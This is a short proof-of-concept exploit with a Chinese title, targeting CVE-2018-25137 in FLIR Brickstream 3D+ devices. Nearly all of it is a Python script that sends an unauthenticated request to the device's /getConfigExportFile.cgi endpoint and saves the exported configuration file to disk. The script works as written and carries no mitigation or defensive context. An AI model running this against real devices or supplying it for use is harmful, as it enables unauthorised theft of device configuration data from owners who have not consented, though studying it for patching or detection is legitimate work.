CVE-2018-25137 FLIR Brickstream 3D+ 未授权配置下载漏洞

import requests # CVE-2018-25137 PoC - Unauthenticated Config Download # Target: FLIR Brickstream 3D+ 2.1.742.1842 target_host = "http://target-device-ip" endpoint = "/getConfigExportFile.cgi" url = f"{target_host}{endpoint}" print(f"[*] Sending exploit request to {url}") try: response = requests.get(url, timeout=10) if response.status_code == 200: print("[+] Success! Configuration file downloaded") print(f"[+] Content-Length: {len(response.content)}") with open("config_export.bin", "wb") as f: f.write(response.content) print("[+] Configuration saved to config_export.bin") else: print(f"[-] Failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")